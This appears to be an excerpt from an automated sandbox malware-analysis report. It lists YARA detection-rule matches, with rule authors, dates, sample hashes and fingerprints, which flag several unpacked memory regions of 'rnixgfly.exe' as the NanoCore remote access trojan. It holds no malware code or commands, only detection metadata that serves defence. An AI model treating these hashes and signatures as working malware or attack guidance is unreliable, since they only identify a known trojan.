    Source: 2.2.rnixgfly.exe.6800000.29.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.6800000.29.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.6800000.29.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
    Source: 2.2.rnixgfly.exe.6800000.29.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 2.2.rnixgfly.exe.58c4629.23.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.58c4629.23.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.58c4629.23.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
    Source: 2.2.rnixgfly.exe.58c4629.23.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 2.2.rnixgfly.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
    Source: 2.2.rnixgfly.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 2.2.rnixgfly.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 2.2.rnixgfly.exe.5e41a8.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.5e41a8.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.5e41a8.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
    Source: 2.2.rnixgfly.exe.5e41a8.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 2.2.rnixgfly.exe.5e41a8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 2.2.rnixgfly.exe.417058.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.417058.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.417058.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
    Source: 2.2.rnixgfly.exe.417058.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 2.2.rnixgfly.exe.417058.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 2.2.rnixgfly.exe.67f0000.28.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.67f0000.28.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.67f0000.28.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
    Source: 2.2.rnixgfly.exe.67f0000.28.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 2.2.rnixgfly.exe.58c0000.24.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.58c0000.24.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.58c0000.24.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
    Source: 2.2.rnixgfly.exe.58c0000.24.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 2.2.rnixgfly.exe.25935b0.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.25935b0.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.25935b0.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
    Source: 2.2.rnixgfly.exe.25935b0.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 2.2.rnixgfly.exe.38ad68f.19.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.38ad68f.19.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.38ad68f.19.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
    Source: 2.2.rnixgfly.exe.38ad68f.19.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 2.2.rnixgfly.exe.38ad68f.19.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 2.2.rnixgfly.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
    Source: 2.2.rnixgfly.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 2.2.rnixgfly.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 2.2.rnixgfly.exe.6820000.31.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.6820000.31.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.6820000.31.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
    Source: 2.2.rnixgfly.exe.6820000.31.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 2.2.rnixgfly.exe.25faee8.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.25faee8.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
    Source: 2.2.rnixgfly.exe.25faee8.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 2.2.rnixgfly.exe.25faee8.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 2.2.rnixgfly.exe.37000f9.16.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
    Source: 2.2.rnixgfly.exe.37000f9.16.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 2.2.rnixgfly.exe.37000f9.16.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 2.2.rnixgfly.exe.68b0000.38.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.68b0000.38.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.68b0000.38.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
    Source: 2.2.rnixgfly.exe.68b0000.38.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 2.2.rnixgfly.exe.6860000.34.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.6860000.34.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.6860000.34.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
    Source: 2.2.rnixgfly.exe.6860000.34.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 2.2.rnixgfly.exe.25e0e74.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.25e0e74.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
    Source: 2.2.rnixgfly.exe.25e0e74.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 2.2.rnixgfly.exe.25e0e74.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 2.2.rnixgfly.exe.687e8a4.36.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.687e8a4.36.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.687e8a4.36.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
    Source: 2.2.rnixgfly.exe.687e8a4.36.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 2.2.rnixgfly.exe.6870000.37.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.6870000.37.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.6870000.37.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
    Source: 2.2.rnixgfly.exe.6870000.37.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 2.2.rnixgfly.exe.5810000.21.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.5810000.21.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.5810000.21.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
